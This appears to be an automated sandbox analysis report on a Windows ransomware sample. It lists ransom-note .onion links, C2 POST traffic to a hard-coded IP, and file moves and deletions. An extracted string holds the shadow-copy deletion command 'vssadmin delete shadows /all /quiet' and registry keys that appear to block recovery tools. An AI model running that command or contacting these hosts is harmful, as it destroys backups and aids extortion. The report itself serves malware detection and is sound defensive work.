Source: RECOVERY INFO.txt115.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt253.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt106.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt17.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt111.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt46.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt66.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt42.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt135.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt174.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt75.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt54.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt245.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt131.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt26.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt67.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt157.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt299.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt18.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt266.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt87.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt139.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt222.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt72.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt228.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt129.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt265.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt182.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt85.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt133.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt59.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt19.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt288.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt150.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt262.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt225.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt186.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76
Source: RECOVERY INFO.txt185.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzOlt/DBDCF16D964ADF694AA8B335FDBE6265B5544FCA2AA13D202A125A57F5D20D76

Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205
Source: Joe Sandbox View	IP Address: 104.26.13.205 104.26.13.205

Source: unknown	DNS query: name: api.ipify.org
Source: unknown	DNS query: name: api.ipify.org

Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49737
Source: Network traffic	Suricata IDS: 2022930 - Severity 1 - ET EXPLOIT Possible CVE-2016-2211 Symantec Cab Parsing Buffer Overflow : 20.109.210.53:443 -> 192.168.2.4:49772

Source: global traffic	HTTP traffic detected: GET / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Host: api.ipify.org
Source: global traffic	HTTP traffic detected: POST /Ujdu8jjooue/biweax.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=------------------------PARZD3yTWAccept: /User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Content-Length: 1892Host: 193.143.1.139
Source: global traffic	HTTP traffic detected: POST /Ujdu8jjooue/biweax.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=------------------------fsYLw7JdOAccept: /User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Content-Length: 1899Host: 193.143.1.139

Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown	TCP traffic detected without corresponding DNS query: 193.143.1.139
Source: unknown	UDP traffic detected without corresponding DNS query: 1.1.1.1

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe

File created: C:\Documents and Settings\user\Local Settings\Temporary Internet Files\Content.IE5\3D003UC5\RECOVERY INFO.txt

Jump to behavior

Source: global traffic

HTTP traffic detected: GET / HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheUser-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Host: api.ipify.org

Source: global traffic

DNS traffic detected: DNS query: api.ipify.org

Source: unknown

HTTP traffic detected: POST /Ujdu8jjooue/biweax.php HTTP/1.1Cache-Control: no-cacheConnection: Keep-AlivePragma: no-cacheContent-Type: multipart/form-data; boundary=------------------------PARZD3yTWAccept: */*User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64; rv:130.0) Gecko/20100101 Firefox/130.0Content-Length: 1892Host: 193.143.1.139

Source: 2b7cu0KwZl.exe, 00000000.00000003.1821529749.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1825034317.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827170187.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829430448.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828747196.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829036005.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1825604403.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1821872031.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828885190.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827723636.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1822607000.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1820251351.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1820510829.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827950839.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828495183.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1823027740.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.143.1.139/
Source: 2b7cu0KwZl.exe, 00000000.00000003.1821529749.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1832275770.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1825034317.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1833404082.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829943691.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1831719140.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830337644.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827170187.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829430448.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1832820189.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828747196.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829036005.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830881739.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1825604403.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1821872031.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830557344.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1833273656.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828885190.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827723636.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1822607000.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1820251351.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.143.1.139/9U6
Source: 2b7cu0KwZl.exe	String found in binary or memory: http://193.143.1.139/Ujdu8jjooue/biweax.php
Source: 2b7cu0KwZl.exe, 00000000.00000003.1820251351.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1820510829.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.143.1.139/Ujdu8jjooue/biweax.php1
Source: 2b7cu0KwZl.exe, 00000000.00000003.1821529749.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1832275770.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1825034317.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1833404082.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829943691.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1831719140.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830337644.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827170187.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829430448.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1832820189.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828747196.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1829036005.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830881739.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1825604403.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1821872031.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1830557344.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1833273656.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1828885190.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1827723636.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1822607000.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1820251351.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://193.143.1.139/Ujdu8jjooue/biweax.php1y6
Source: 2b7cu0KwZl.exe	String found in binary or memory: http://api.ipify.org
Source: 2b7cu0KwZl.exe, 00000000.00000003.1805381540.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1804619437.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1805035456.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1819160509.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1808182808.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1808323206.000001F7CA88F000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/
Source: 2b7cu0KwZl.exe, 00000000.00000003.1817076512.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1822753296.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1804503862.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1819426905.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1822334255.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1805117359.000001F7C8C24000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://api.ipify.org/6
Source: 2b7cu0KwZl.exe	String found in binary or memory: http://api.ipify.orgunknown------------------------multipart/form-data;
Source: 2b7cu0KwZl.exe, 00000000.00000003.1852408139.000001F7CBE26000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1852516311.000001F7CA886000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dmd-ca-beta2/CertEnroll/Microsoft%20Digital%20Media%20Authority%202005.crl
Source: 2b7cu0KwZl.exe, 00000000.00000003.1852408139.000001F7CBE26000.00000004.00000020.00020000.00000000.sdmp, 2b7cu0KwZl.exe, 00000000.00000003.1852516311.000001F7CA886000.00000004.00000020.00020000.00000000.sdmp	String found in binary or memory: http://dmd-ca-beta2/CertEnroll/dmd-ca-beta2_Microsoft%20Digital%20Media%20Authority%202005.crt0d
Source: RECOVERY INFO.txt62.0.dr, RECOVERY INFO.txt283.0.dr, RECOVERY INFO.txt37.0.dr, RECOVERY INFO.txt10.0.dr, RECOVERY INFO.txt196.0.dr, RECOVERY INFO.txt304.0.dr, RECOVERY INFO.txt153.0.dr, RECOVERY INFO.txt89.0.dr, RECOVERY INFO.txt257.0.dr, RECOVERY INFO.txt155.0.dr, RECOVERY INFO.txt56.0.dr, RECOVERY INFO.txt52.0.dr, RECOVERY INFO.txt275.0.dr, RECOVERY INFO.txt115.0.dr, RECOVERY INFO.txt253.0.dr, RECOVERY INFO.txt106.0.dr, RECOVERY INFO.txt17.0.dr, RECOVERY INFO.txt111.0.dr, RECOVERY INFO.txt46.0.dr, RECOVERY INFO.txt66.0.dr, RECOVERY INFO.txt42.0.dr	String found in binary or memory: http://weaxorpemwzoxg5cdvvfd77p3qczkxqii37ww4foo2n4jcft3mytbpyd.onion/lsaHqOhaJLOyrWSPvtJajdzqrftqzO

Spam, unwanted Advertisements and Ransom Demands

Deletes shadow drive data (may be related to ransomware)

Source: 2b7cu0KwZl.exe, 00000000.00000000.1791805543.00007FF6882F3000.00000002.00000001.01000000.00000003.sdmp	Binary or memory string: SeTakeOwnershipPrivilegeSeDebugPrivilegePowrProf.dllPowerSetActiveScheme\sysnative\vssadmin.exe delete shadows /all /quietopenSOFTWARE\RaccineSYSTEM\CurrentControlSet\Services\EventLog\Application\RaccineSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exep
Source: 2b7cu0KwZl.exe	Binary or memory string: SeTakeOwnershipPrivilegeSeDebugPrivilegePowrProf.dllPowerSetActiveScheme\sysnative\vssadmin.exe delete shadows /all /quietopenSOFTWARE\RaccineSYSTEM\CurrentControlSet\Services\EventLog\Application\RaccineSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\vssadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wmic.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\wbadmin.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\bcdedit.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\powershell.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\diskshadow.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\net.exeSOFTWARE\Microsoft\Windows NT\CurrentVersion\Image File Execution Options\taskkill.exep

Modifies existing user documents (likely ransomware behavior)

Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File moved: C:\Users\user\Desktop\ZBEDCJPBEY.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File deleted: C:\Users\user\Desktop\ZBEDCJPBEY.xlsx	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File moved: C:\Users\user\Desktop\YPSIACHYXW\NIKHQAIQAU.png	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File deleted: C:\Users\user\Desktop\YPSIACHYXW\NIKHQAIQAU.png	Jump to behavior
Source: C:\Users\user\Desktop\2b7cu0KwZl.exe	File moved: C:\Users\user\Desktop\VAMYDFPUND.mp3	Jump to behavior

Writes a notice file (html or txt) to demand a ransom

